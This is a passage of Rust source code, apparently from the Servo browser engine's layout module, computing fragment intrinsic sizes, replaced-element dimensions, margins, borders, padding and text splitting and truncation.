QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED; if self.style.get_inheritedtable().border_collapse == border_collapse::T::separate { base_quantities | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_BORDER } else { base_quantities } } SpecificFragmentInfo::TableWrapper => { let base_quantities = QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_MARGINS | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED; if self.style.get_inheritedtable().border_collapse == border_collapse::T::separate { base_quantities | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_BORDER } else { base_quantities } } SpecificFragmentInfo::TableRow => { let base_quantities = QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED; if self.style.get_inheritedtable().border_collapse == border_collapse::T::separate { base_quantities | QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_BORDER } else { base_quantities } } SpecificFragmentInfo::TruncatedFragment(_) | SpecificFragmentInfo::ScannedText(_) | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::UnscannedText(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) | SpecificFragmentInfo::InlineBlock(_) | SpecificFragmentInfo::MulticolColumn => { QuantitiesIncludedInIntrinsicInlineSizes::empty() } } } /// Returns the portion of the intrinsic inline-size that consists of borders/padding and /// margins, respectively. /// /// FIXME(#2261, pcwalton): This won't work well for inlines: is this OK? pub fn surrounding_intrinsic_inline_size(&self) -> (Au, Au) { let flags = self.quantities_included_in_intrinsic_inline_size(); let style = self.style(); // FIXME(pcwalton): Percentages should be relative to any definite size per CSS-SIZING. // This will likely need to be done by pushing down definite sizes during selector // cascading. let margin = if flags.contains( QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_MARGINS) { let margin = style.logical_margin(); (MaybeAuto::from_style(margin.inline_start, Au(0)).specified_or_zero() + MaybeAuto::from_style(margin.inline_end, Au(0)).specified_or_zero()) } else { Au(0) }; // FIXME(pcwalton): Percentages should be relative to any definite size per CSS-SIZING. // This will likely need to be done by pushing down definite sizes during selector // cascading. let padding = if flags.contains( QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_PADDING) { let padding = style.logical_padding(); (padding.inline_start.to_used_value(Au(0)) + padding.inline_end.to_used_value(Au(0))) } else { Au(0) }; let border = if flags.contains( QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_BORDER) { self.border_width().inline_start_end() } else { Au(0) }; (border + padding, margin) } /// Uses the style only to estimate the intrinsic inline-sizes. These may be modified for text /// or replaced elements. pub fn style_specified_intrinsic_inline_size(&self) -> IntrinsicISizesContribution { let flags = self.quantities_included_in_intrinsic_inline_size(); let style = self.style(); // FIXME(#2261, pcwalton): This won't work well for inlines: is this OK? let (border_padding, margin) = self.surrounding_intrinsic_inline_size(); let mut specified = Au(0); if flags.contains(QuantitiesIncludedInIntrinsicInlineSizes::INTRINSIC_INLINE_SIZE_INCLUDES_SPECIFIED) { specified = MaybeAuto::from_style(style.content_inline_size(), Au(0)).specified_or_zero(); specified = max(style.min_inline_size().to_used_value(Au(0)), specified); if let Some(max) = style.max_inline_size().to_used_value(Au(0)) { specified = min(specified, max) } if self.style.get_position().box_sizing == box_sizing::T::border_box { specified = max(Au(0), specified - border_padding); } } IntrinsicISizesContribution { content_intrinsic_sizes: IntrinsicISizes { minimum_inline_size: specified, preferred_inline_size: specified, }, surrounding_size: border_padding + margin, } } /// intrinsic width of this replaced element. #[inline] pub fn intrinsic_width(&self) -> Au { match self.specific { SpecificFragmentInfo::Image(ref info) => { if let Some(ref data) = info.metadata { Au::from_px(data.width as i32) } else { Au(0) } } SpecificFragmentInfo::Canvas(ref info) => info.dom_width, SpecificFragmentInfo::Svg(ref info) => info.dom_width, // Note: Currently for replaced element with no intrinsic size, // this function simply returns the default object size. As long as // these elements do not have intrinsic aspect ratio this should be // sufficient, but we may need to investigate if this is enough for // use cases like SVG. SpecificFragmentInfo::Iframe(_) => Au::from_px(DEFAULT_REPLACED_WIDTH), _ => panic!("Trying to get intrinsic width on non-replaced element!") } } /// intrinsic width of this replaced element. #[inline] pub fn intrinsic_height(&self) -> Au { match self.specific { SpecificFragmentInfo::Image(ref info) => { if let Some(ref data) = info.metadata { Au::from_px(data.height as i32) } else { Au(0) } } SpecificFragmentInfo::Canvas(ref info) => info.dom_height, SpecificFragmentInfo::Svg(ref info) => info.dom_height, SpecificFragmentInfo::Iframe(_) => Au::from_px(DEFAULT_REPLACED_HEIGHT), _ => panic!("Trying to get intrinsic height on non-replaced element!") } } /// Whether this replace element has intrinsic aspect ratio. pub fn has_intrinsic_ratio(&self) -> bool { match self.specific { SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::Canvas(_) | // TODO(stshine): According to the SVG spec, whether a SVG element has intrinsic // aspect ratio is determined by the `preserveAspectRatio` attribute. Since for // now SVG is far from implemented, we simply choose the default behavior that // the intrinsic aspect ratio is preserved. // https://svgwg.org/svg2-draft/coords.html#PreserveAspectRatioAttribute SpecificFragmentInfo::Svg(_) => self.intrinsic_width() != Au(0) && self.intrinsic_height() != Au(0), _ => false } } /// CSS 2.1 § 10.3.2 & 10.6.2 Calculate the used width and height of a replaced element. /// When a parameter is `None` it means the specified size in certain direction /// is unconstrained. The inline containing size can also be `None` since this /// method is also used for calculating intrinsic inline size contribution. pub fn calculate_replaced_sizes(&self, containing_inline_size: Option<Au>, containing_block_size: Option<Au>) -> (Au, Au) { let (intrinsic_inline_size, intrinsic_block_size) = if self.style.writing_mode.is_vertical() { (self.intrinsic_height(), self.intrinsic_width()) } else { (self.intrinsic_width(), self.intrinsic_height()) }; // Make sure the size we used here is for content box since they may be // transferred by the intrinsic aspect ratio. let inline_size = style_length(self.style.content_inline_size(), containing_inline_size) .map(|x| x - self.box_sizing_boundary(Direction::Inline)); let block_size = style_length(self.style.content_block_size(), containing_block_size) .map(|x| x - self.box_sizing_boundary(Direction::Block)); let inline_constraint = self.size_constraint(containing_inline_size, Direction::Inline); let block_constraint = self.size_constraint(containing_block_size, Direction::Block); // https://drafts.csswg.org/css-images-3/#default-sizing match (inline_size, block_size) { // If the specified size is a definite width and height, the concrete // object size is given that width and height. (MaybeAuto::Specified(inline_size), MaybeAuto::Specified(block_size)) => (inline_constraint.clamp(inline_size), block_constraint.clamp(block_size)), // If the specified size is only a width or height (but not both) // then the concrete object size is given that specified width or // height. The other dimension is calculated as follows: // // If the object has an intrinsic aspect ratio, the missing dimension // of the concrete object size is calculated using the intrinsic // aspect ratio and the present dimension. // // Otherwise, if the missing dimension is present in the object’s intrinsic // dimensions, the missing dimension is taken from the object’s intrinsic // dimensions. Otherwise it is taken from the default object size. (MaybeAuto::Specified(inline_size), MaybeAuto::Auto) => { let inline_size = inline_constraint.clamp(inline_size); let block_size = if self.has_intrinsic_ratio() { // Note: We can not precompute the ratio and store it as a float, because // doing so may result one pixel difference in calculation for certain // images, thus make some tests fail. Au::new((inline_size.0 as i64 * intrinsic_block_size.0 as i64 / intrinsic_inline_size.0 as i64) as i32) } else { intrinsic_block_size }; (inline_size, block_constraint.clamp(block_size)) } (MaybeAuto::Auto, MaybeAuto::Specified(block_size)) => { let block_size = block_constraint.clamp(block_size); let inline_size = if self.has_intrinsic_ratio() { Au::new((block_size.0 as i64 * intrinsic_inline_size.0 as i64 / intrinsic_block_size.0 as i64) as i32) } else { intrinsic_inline_size }; (inline_constraint.clamp(inline_size), block_size) } // https://drafts.csswg.org/css2/visudet.html#min-max-widths (MaybeAuto::Auto, MaybeAuto::Auto) => { if self.has_intrinsic_ratio() { // This approch follows the spirit of cover and contain constraint. // https://drafts.csswg.org/css-images-3/#cover-contain // First, create two rectangles that keep aspect ratio while may be clamped // by the contraints; let first_isize = inline_constraint.clamp(intrinsic_inline_size); let first_bsize = Au::new((first_isize.0 as i64 * intrinsic_block_size.0 as i64 / intrinsic_inline_size.0 as i64) as i32); let second_bsize = block_constraint.clamp(intrinsic_block_size); let second_isize = Au::new((second_bsize.0 as i64 * intrinsic_inline_size.0 as i64 / intrinsic_block_size.0 as i64) as i32); let (inline_size, block_size) = match (first_isize.cmp(&intrinsic_inline_size) , second_isize.cmp(&intrinsic_inline_size)) { (Ordering::Equal, Ordering::Equal) => (first_isize, first_bsize), // When only one rectangle is clamped, use it; (Ordering::Equal, _) => (second_isize, second_bsize), (_, Ordering::Equal) => (first_isize, first_bsize), // When both rectangles grow (smaller than min sizes), // Choose the larger one; (Ordering::Greater, Ordering::Greater) => if first_isize > second_isize { (first_isize, first_bsize) } else { (second_isize, second_bsize) }, // When both rectangles shrink (larger than max sizes), // Choose the smaller one; (Ordering::Less, Ordering::Less) => if first_isize > second_isize { (second_isize, second_bsize) } else { (first_isize, first_bsize) }, // It does not matter which we choose here, because both sizes // will be clamped to constraint; (Ordering::Less, Ordering::Greater) | (Ordering::Greater, Ordering::Less) => (first_isize, first_bsize) }; // Clamp the result and we are done :-) (inline_constraint.clamp(inline_size), block_constraint.clamp(block_size)) } else { (inline_constraint.clamp(intrinsic_inline_size), block_constraint.clamp(intrinsic_block_size)) } } } } /// Return a size constraint that can be used the clamp size in given direction. /// To take `box-sizing: border-box` into account, the `border_padding` field /// must be initialized first. /// /// TODO(stshine): Maybe there is a more convenient way. pub fn size_constraint(&self, containing_size: Option<Au>, direction: Direction) -> SizeConstraint { let (style_min_size, style_max_size) = match direction { Direction::Inline => (self.style.min_inline_size(), self.style.max_inline_size()), Direction::Block => (self.style.min_block_size(), self.style.max_block_size()) }; let border = if self.style().get_position().box_sizing == box_sizing::T::border_box { Some(self.border_padding.start_end(direction)) } else { None }; SizeConstraint::new(containing_size, style_min_size, style_max_size, border) } /// Returns a guess as to the distances from the margin edge of this fragment to its content /// in the inline direction. This will generally be correct unless percentages are involved. /// /// This is used for the float placement speculation logic. pub fn guess_inline_content_edge_offsets(&self) -> SpeculatedInlineContentEdgeOffsets { let logical_margin = self.style.logical_margin(); let logical_padding = self.style.logical_padding(); let border_width = self.border_width(); SpeculatedInlineContentEdgeOffsets { start: MaybeAuto::from_style(logical_margin.inline_start, Au(0)).specified_or_zero() + logical_padding.inline_start.to_used_value(Au(0)) + border_width.inline_start, end: MaybeAuto::from_style(logical_margin.inline_end, Au(0)).specified_or_zero() + logical_padding.inline_end.to_used_value(Au(0)) + border_width.inline_end, } } /// Returns the sum of the inline-sizes of all the borders of this fragment. Note that this /// can be expensive to compute, so if possible use the `border_padding` field instead. #[inline] pub fn border_width(&self) -> LogicalMargin<Au> { let style_border_width = self.style().logical_border_width(); // NOTE: We can have nodes with different writing mode inside // the inline fragment context, so we need to overwrite the // writing mode to compute the child logical sizes. let writing_mode = self.style.writing_mode; let context_border = match self.inline_context { None => LogicalMargin::zero(writing_mode), Some(ref inline_fragment_context) => { inline_fragment_context.nodes.iter().fold(style_border_width, |accumulator, node| { let mut this_border_width = node.style.border_width_for_writing_mode(writing_mode); if !node.flags.contains(InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { this_border_width.inline_start = Au(0) } if !node.flags.contains(InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { this_border_width.inline_end = Au(0) } accumulator + this_border_width }) } }; style_border_width + context_border } /// Returns the border width in given direction if this fragment has property /// 'box-sizing: border-box'. The `border_padding` field must have been initialized. pub fn box_sizing_boundary(&self, direction: Direction) -> Au { match (self.style().get_position().box_sizing, direction) { (box_sizing::T::border_box, Direction::Inline) => { self.border_padding.inline_start_end() } (box_sizing::T::border_box, Direction::Block) => { self.border_padding.block_start_end() } _ => Au(0) } } /// Computes the margins in the inline direction from the containing block inline-size and the /// style. After this call, the inline direction of the `margin` field will be correct. /// /// Do not use this method if the inline direction margins are to be computed some other way /// (for example, via constraint solving for blocks). pub fn compute_inline_direction_margins(&mut self, containing_block_inline_size: Au) { match self.specific { SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) => { self.margin.inline_start = Au(0); self.margin.inline_end = Au(0); return } _ => { let margin = self.style().logical_margin(); self.margin.inline_start = MaybeAuto::from_style(margin.inline_start, containing_block_inline_size).specified_or_zero(); self.margin.inline_end = MaybeAuto::from_style(margin.inline_end, containing_block_inline_size).specified_or_zero(); } } if let Some(ref inline_context) = self.inline_context { for node in &inline_context.nodes { let margin = node.style.logical_margin(); let this_inline_start_margin = if !node.flags.contains( InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { Au(0) } else { MaybeAuto::from_style(margin.inline_start, containing_block_inline_size).specified_or_zero() }; let this_inline_end_margin = if!node.flags.contains( InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { Au(0) } else { MaybeAuto::from_style(margin.inline_end, containing_block_inline_size).specified_or_zero() }; self.margin.inline_start += this_inline_start_margin; self.margin.inline_end += this_inline_end_margin; } } } /// Computes the margins in the block direction from the containing block inline-size and the /// style. After this call, the block direction of the `margin` field will be correct. /// /// Do not use this method if the block direction margins are to be computed some other way /// (for example, via constraint solving for absolutely-positioned flows). pub fn compute_block_direction_margins(&mut self, containing_block_inline_size: Au) { match self.specific { SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableColumn(_) => { self.margin.block_start = Au(0); self.margin.block_end = Au(0) } _ => { // NB: Percentages are relative to containing block inline-size (not block-size) // per CSS 2.1. let margin = self.style().logical_margin(); self.margin.block_start = MaybeAuto::from_style(margin.block_start, containing_block_inline_size) .specified_or_zero(); self.margin.block_end = MaybeAuto::from_style(margin.block_end, containing_block_inline_size) .specified_or_zero(); } } } /// Computes the border and padding in both inline and block directions from the containing /// block inline-size and the style. After this call, the `border_padding` field will be /// correct. pub fn compute_border_and_padding(&mut self, containing_block_inline_size: Au) { // Compute border. let border = match self.style.get_inheritedtable().border_collapse { border_collapse::T::separate => self.border_width(), border_collapse::T::collapse => LogicalMargin::zero(self.style.writing_mode), }; // Compute padding from the fragment's style. let padding_from_style = match self.specific { SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper => LogicalMargin::zero(self.style.writing_mode), _ => model::padding_from_style(self.style(), containing_block_inline_size, self.style().writing_mode), }; // Compute padding from the inline fragment context. let padding_from_inline_fragment_context = match (&self.specific, &self.inline_context) { (_, &None) | (&SpecificFragmentInfo::TableColumn(_), _) | (&SpecificFragmentInfo::TableRow, _) | (&SpecificFragmentInfo::TableWrapper, _) => { LogicalMargin::zero(self.style.writing_mode) } (_, &Some(ref inline_fragment_context)) => { let writing_mode = self.style.writing_mode; let zero_padding = LogicalMargin::zero(writing_mode); inline_fragment_context.nodes.iter().fold(zero_padding, |accumulator, node| { let mut padding = model::padding_from_style(&*node.style, Au(0), writing_mode); if !node.flags.contains(InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { padding.inline_start = Au(0) } if !node.flags.contains(InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { padding.inline_end = Au(0) } accumulator + padding }) } }; self.border_padding = border + padding_from_style + padding_from_inline_fragment_context } // Return offset from original position because of `position: relative`. pub fn relative_position(&self, containing_block_size: &LogicalSize<Au>) -> LogicalSize<Au> { fn from_style(style: &ComputedValues, container_size: &LogicalSize<Au>) -> LogicalSize<Au> { let offsets = style.logical_position(); let offset_i = if offsets.inline_start != LengthOrPercentageOrAuto::Auto { MaybeAuto::from_style(offsets.inline_start, container_size.inline).specified_or_zero() } else { -MaybeAuto::from_style(offsets.inline_end, container_size.inline).specified_or_zero() }; let offset_b = if offsets.block_start != LengthOrPercentageOrAuto::Auto { MaybeAuto::from_style(offsets.block_start, container_size.block).specified_or_zero() } else { -MaybeAuto::from_style(offsets.block_end, container_size.block).specified_or_zero() }; LogicalSize::new(style.writing_mode, offset_i, offset_b) } // Go over the ancestor fragments and add all relative offsets (if any). let mut rel_pos = if self.style().get_box().position == position::T::relative { from_style(self.style(), containing_block_size) } else { LogicalSize::zero(self.style.writing_mode) }; if let Some(ref inline_fragment_context) = self.inline_context { for node in &inline_fragment_context.nodes { if node.style.get_box().position == position::T::relative { rel_pos = rel_pos + from_style(&*node.style, containing_block_size); } } } rel_pos } /// Always inline for SCCP. /// /// FIXME(pcwalton): Just replace with the clear type from the style module for speed? #[inline(always)] pub fn clear(&self) -> Option<ClearType> { let style = self.style(); match style.get_box().clear { clear::T::none => None, clear::T::left => Some(ClearType::Left), clear::T::right => Some(ClearType::Right), clear::T::both => Some(ClearType::Both), } } #[inline(always)] pub fn style(&self) -> &ComputedValues { &*self.style } #[inline(always)] pub fn selected_style(&self) -> &ComputedValues { &*self.selected_style } pub fn white_space(&self) -> white_space::T { self.style().get_inheritedtext().white_space } pub fn color(&self) -> color::T { self.style().get_color().color } /// Returns the text decoration line of this fragment, according to the style of the nearest ancestor /// element. /// /// NB: This may not be the actual text decoration line, because of the override rules specified in /// CSS 2.1 § 16.3.1. Unfortunately, computing this properly doesn't really fit into Servo's /// model. Therefore, this is a best lower bound approximation, but the end result may actually /// have the various decoration flags turned on afterward. pub fn text_decoration_line(&self) -> text_decoration_line::T { self.style().get_text().text_decoration_line } /// Returns the inline-start offset from margin edge to content edge. /// /// FIXME(#2262, pcwalton): I think this method is pretty bogus, because it won't work for /// inlines. pub fn inline_start_offset(&self) -> Au { match self.specific { SpecificFragmentInfo::TableWrapper => self.margin.inline_start, SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableRow => self.border_padding.inline_start, SpecificFragmentInfo::TableColumn(_) => Au(0), _ => self.margin.inline_start + self.border_padding.inline_start, } } /// Returns true if this element can be split. This is true for text fragments, unless /// `white-space: pre` or `white-space: nowrap` is set. pub fn can_split(&self) -> bool { self.is_scanned_text_fragment() && self.white_space().allow_wrap() } /// Returns true if and only if this fragment is a generated content fragment. pub fn is_unscanned_generated_content(&self) -> bool { match self.specific { SpecificFragmentInfo::GeneratedContent(ref content) => match **content { GeneratedContentInfo::Empty => false, _ => true, }, _ => false, } } /// Returns true if and only if this is a scanned text fragment. pub fn is_scanned_text_fragment(&self) -> bool { match self.specific { SpecificFragmentInfo::ScannedText(..) => true, _ => false, } } /// Computes the intrinsic inline-sizes of this fragment. pub fn compute_intrinsic_inline_sizes(&mut self) -> IntrinsicISizesContribution { let mut result = self.style_specified_intrinsic_inline_size(); match self.specific { SpecificFragmentInfo::Generic | SpecificFragmentInfo::GeneratedContent(_) | SpecificFragmentInfo::Table | SpecificFragmentInfo::TableCell | SpecificFragmentInfo::TableColumn(_) | SpecificFragmentInfo::TableRow | SpecificFragmentInfo::TableWrapper | SpecificFragmentInfo::Multicol | SpecificFragmentInfo::MulticolColumn | SpecificFragmentInfo::InlineAbsoluteHypothetical(_) => {} SpecificFragmentInfo::InlineBlock(ref info) => { let block_flow = info.flow_ref.as_block(); result.union_block(&block_flow.base.intrinsic_inline_sizes) } SpecificFragmentInfo::InlineAbsolute(ref info) => { let block_flow = info.flow_ref.as_block(); result.union_block(&block_flow.base.intrinsic_inline_sizes) } SpecificFragmentInfo::Image(_) | SpecificFragmentInfo::Canvas(_) | SpecificFragmentInfo::Iframe(_) | SpecificFragmentInfo::Svg(_) => { let mut inline_size = match self.style.content_inline_size() { LengthOrPercentageOrAuto::Auto | LengthOrPercentageOrAuto::Percentage(_) => { // We have to initialize the `border_padding` field first to make // the size constraints work properly. // TODO(stshine): Find a cleaner way to do this. let padding = self.style.logical_padding(); self.border_padding.inline_start = padding.inline_start.to_used_value(Au(0)); self.border_padding.inline_end = padding.inline_end.to_used_value(Au(0)); self.border_padding.block_start = padding.block_start.to_used_value(Au(0)); self.border_padding.block_end = padding.block_end.to_used_value(Au(0)); let border = self.border_width(); self.border_padding.inline_start += border.inline_start; self.border_padding.inline_end += border.inline_end; self.border_padding.block_start += border.block_start; self.border_padding.block_end += border.block_end; let (result_inline, _) = self.calculate_replaced_sizes(None, None); result_inline } LengthOrPercentageOrAuto::Length(length) => Au::from(length), LengthOrPercentageOrAuto::Calc(calc) => { // TODO(nox): This is probably wrong, because it accounts neither for // clamping (not sure if necessary here) nor percentage. Au::from(calc.unclamped_length()) }, }; let size_constraint = self.size_constraint(None, Direction::Inline); inline_size = size_constraint.clamp(inline_size); result.union_block(&IntrinsicISizes { minimum_inline_size: inline_size, preferred_inline_size: inline_size, }); } SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let text_fragment_info = t.text_info.as_ref().unwrap(); handle_text(text_fragment_info, self, &mut result) } SpecificFragmentInfo::ScannedText(ref text_fragment_info) => { handle_text(text_fragment_info, self, &mut result) } SpecificFragmentInfo::TruncatedFragment(_) => { return IntrinsicISizesContribution::new() } SpecificFragmentInfo::UnscannedText(..) => { panic!("Unscanned text fragments should have been scanned by now!") } }; fn handle_text(text_fragment_info: &ScannedTextFragmentInfo, self_: &Fragment, result: &mut IntrinsicISizesContribution) { let range = &text_fragment_info.range; // See http://dev.w3.org/csswg/css-sizing/#max-content-inline-size. // TODO: Account for soft wrap opportunities. let max_line_inline_size = text_fragment_info.run .metrics_for_range(range) .advance_width; let min_line_inline_size = if self_.white_space().allow_wrap() { text_fragment_info.run.min_width_for_range(range) } else { max_line_inline_size }; result.union_block(&IntrinsicISizes { minimum_inline_size: min_line_inline_size, preferred_inline_size: max_line_inline_size, }) } // Take borders and padding for parent inline fragments into account. let writing_mode = self.style.writing_mode; if let Some(ref context) = self.inline_context { for node in &context.nodes { let mut border_width = node.style.logical_border_width(); let mut padding = model::padding_from_style(&*node.style, Au(0), writing_mode); let mut margin = model::specified_margin_from_style(&*node.style, writing_mode); if !node.flags.contains(InlineFragmentNodeFlags::FIRST_FRAGMENT_OF_ELEMENT) { border_width.inline_start = Au(0); padding.inline_start = Au(0); margin.inline_start = Au(0); } if !node.flags.contains(InlineFragmentNodeFlags::LAST_FRAGMENT_OF_ELEMENT) { border_width.inline_end = Au(0); padding.inline_end = Au(0); margin.inline_end = Au(0); } result.surrounding_size = result.surrounding_size + border_width.inline_start_end() + padding.inline_start_end() + margin.inline_start_end(); } } result } /// Returns the narrowest inline-size that the first splittable part of this fragment could /// possibly be split to. (In most cases, this returns the inline-size of the first word in /// this fragment.) pub fn minimum_splittable_inline_size(&self) -> Au { match self.specific { SpecificFragmentInfo::TruncatedFragment(ref t) if t.text_info.is_some() => { let text = t.text_info.as_ref().unwrap(); text.run.minimum_splittable_inline_size(&text.range) } SpecificFragmentInfo::ScannedText(ref text) => { text.run.minimum_splittable_inline_size(&text.range) } _ => Au(0), } } /// Returns the dimensions of the content box. /// /// This is marked `#[inline]` because it is frequently called when only one or two of the /// values are needed and that will save computation. #[inline] pub fn content_box(&self) -> LogicalRect<Au> { self.border_box - self.border_padding } /// Attempts to find the split positions of a text fragment so that its inline-size is no more /// than `max_inline_size`. /// /// A return value of `None` indicates that the fragment could not be split. Otherwise the /// information pertaining to the split is returned. The inline-start and inline-end split /// information are both optional due to the possibility of them being whitespace. pub fn calculate_split_position(&self, max_inline_size: Au, starts_line: bool) -> Option<SplitResult> { let text_fragment_info = match self.specific { SpecificFragmentInfo::ScannedText(ref text_fragment_info) => text_fragment_info, _ => return None, }; let mut flags = SplitOptions::empty(); if starts_line { flags.insert(SplitOptions::STARTS_LINE); if self.style().get_inheritedtext().overflow_wrap == overflow_wrap::T::break_word { flags.insert(SplitOptions::RETRY_AT_CHARACTER_BOUNDARIES) } } match self.style().get_inheritedtext().word_break { word_break::T::normal | word_break::T::keep_all => { // Break at normal word boundaries. keep-all forbids soft wrap opportunities. let natural_word_breaking_strategy = text_fragment_info.run.natural_word_slices_in_range(&text_fragment_info.range); self.calculate_split_position_using_breaking_strategy( natural_word_breaking_strategy, max_inline_size, flags) } word_break::T::break_all => { // Break at character boundaries. let character_breaking_strategy = text_fragment_info.run.character_slices_in_range(&text_fragment_info.range); flags.remove(SplitOptions::RETRY_AT_CHARACTER_BOUNDARIES); self.calculate_split_position_using_breaking_strategy( character_breaking_strategy, max_inline_size, flags) } } } /// Truncates this fragment to the given `max_inline_size`, using a character-based breaking /// strategy. The resulting fragment will have `SpecificFragmentInfo::TruncatedFragment`, /// preserving the original fragment for use in incremental reflow. /// /// This function will panic if self is already truncated. pub fn truncate_to_inline_size(self, max_inline_size: Au) -> Fragment { if let SpecificFragmentInfo::TruncatedFragment(_) = self.specific { panic!("Cannot truncate an already truncated fragment"); } let info = self.calculate_truncate_to_inline_size(max_inline_size); let (size, text_info) = match info { Some(TruncationResult { split: SplitInfo { inline_size, range }, text_run } ) => { let size = LogicalSize::new(self.style.writing_mode, inline_size, self.border_box.size.block); // Preserve the insertion point if it is in this fragment's range or it is at line end. let (flags, insertion_point) = match self.specific { SpecificFragmentInfo::ScannedText(ref info) => { match info.insertion_point { Some(index) if range.contains(index) => (info.flags, info.insertion_point), Some(index) if index == ByteIndex(text_run.text.chars().count() as isize - 1) && index == range.end() => (info.flags, info.insertion_point), _ => (info.flags, None) } }, _ => (ScannedTextFlags::empty(), None) }; let text_info = ScannedTextFragmentInfo::new( text_run, range, size, insertion_point, flags); (size, Some(text_info)) } None => (LogicalSize::zero(self.style.writing_mode), None) }; let mut result = self.transform(size, SpecificFragmentInfo::Generic); result.specific = SpecificFragmentInfo::TruncatedFragment(Box::new(TruncatedFragmentInfo { text_info: text_info, full: self, })); result } /// Truncates this fragment to the given `max_inline_size`, using a character-based breaking /// strategy. If no characters could fit, returns `None`. fn calculate_truncate_to_inline_size(&self, max_inline_size: Au) -> Option<TruncationResult> { let text_fragment_info = if let SpecificFragmentInfo::ScannedText(ref text_fragment_info) = self.specific { text_fragment_info } else { return None }; let character_breaking_strategy = text_fragment_info.run.character_slices_in_range(&text_fragment_info.range); match self.calculate_split_position_using_breaking_strategy(character_breaking_strategy, max_inline_size, SplitOptions::empty()) { None => None, Some(split_info) => { match split_info.inline_start { None => None, Some(split) => { Some(TruncationResult { split: split, text_run: split_info.text_run.clone(), }) } } } } } /// A helper method that uses the breaking strategy described by `slice_iterator` (at present, /// either natural word breaking or character breaking) to split this fragment. fn calculate_split_position_using_breaking_strategy<'a, I>( &self, slice_iterator: I, max_inline_size: Au, flags: SplitOptions) -> Option<SplitResult> where I: Iterator<Item=TextRunSlice<'a>> { let text_fragment_info = match self.specific { SpecificFragmentInfo::ScannedText(ref text_fragment_info) => text_fragment_info, _ => return None, }; let mut remaining_inline_size = max_inline_size - self.border_padding.inline_start_end(); let mut inline_start_range = Range::new(text_fragment_info.range.begin(), ByteIndex(0)); let mut inline_end_range = None; let mut overflowing = false; debug!("calculate_split_position_using_breaking_strategy: splitting text fragment \ (strlen={}, range={:?}, max_inline_size={:?})", text_fragment_info.run.text.len(), text_fragment_info.range, max_inline_size); for slice in slice_iterator { debug!("calculate_split_position_using_breaking_strategy: considering slice \ (offset={:?}, slice range={:?}, remaining_inline_size={:?})", slice.offset, slice.range, remaining_inline_size); // Use the `remaining_inline_size` to find a split point if possible. If not, go around // the loop again with the next slice. let metrics = text_fragment_info.run.metrics_for_slice(slice.glyphs, &slice.range); let advance = metrics.advance_width; // Have we found the split point? if advance <= remaining_inline_size || slice.glyphs.is_whitespace() { // Keep going; we haven't found the split point yet. debug!("calculate_split_position_using_breaking_strategy: enlarging span"); remaining_inline_size = remaining_inline_size - advance; inline_start_range.extend_by(slice.range.length()); continue } // The advance is more than the remaining inline-size, so split here. First, check to // see if we're going to overflow the line. If so, perform a best-effort split. let mut remaining_range = slice.text_run_range(); let split_is_empty = inline_start_range.is_empty() && !(self.requires_line_break_afterward_if_wrapping_on_newlines() && !self.white_space().allow_wrap()); if split_is_empty { // We're going to overflow the line. overflowing = true; inline_start_range = slice.text_run_range(); remaining_range = Range::new(slice.text_run_range().end(), ByteIndex(0)); remaining_range.extend_to(text_fragment_info.range.end()); } // Check to see if we need to create an inline-end chunk. let slice_begin = remaining_range.begin(); if slice_begin < text_fragment_info.range.end() { // There still some things left over at the end of the line, so create the // inline-end chunk. let mut inline_end = remaining_range; inline_end.extend_to(text_fragment_info.range.end()); inline_end_range = Some(inline_end); debug!("calculate_split_position: splitting remainder with inline-end range={:?}", inline_end); } // If we failed to find a suitable split point, we're on the verge of overflowing the // line. if split_is_empty || overflowing { // If we've been instructed to retry at character boundaries (probably via // `overflow-wrap: break-word`), do so. if flags.contains(SplitOptions::RETRY_AT_CHARACTER_BOUNDARIES) { let character_breaking_strategy = text_fragment_info.run .character_slices_in_range(&text_fragment_info.range); let mut flags = flags; flags.remove(SplitOptions::RETRY_AT_CHARACTER_BOUNDARIES); return self.calculate_split_position_using_breaking_strategy( character_breaking_strategy, max_inline_size, flags) } // We aren't at the start of the line, so don't overflow. Let inline layout wrap to // the next line instead. if !flags.contains(SplitOptions::STARTS_LINE) { return None } } break } let split_is_empty = inline_start_range.is_empty() && !self.requires_line_break_afterward_if_wrapping_on_newlines(); let inline_start = if !split_is_empty { Some(SplitInfo::new(inline_start_range, &**text_fragment_info)) } else { None }; let inline_end = inline_end_range.map(|inline_end_range| { SplitInfo::new(inline_end_range, &**text_fragment_info) }); Some(SplitResult { inline_start: inline_start, inline_end: inline_end, text_run: text_fragment_info.run.clone(), }) } /// The opposite of `calculate_split_position_using_breaking_strategy`: merges this fragment /// with the next one. pub fn merge_with(&mut self, next_fragment: 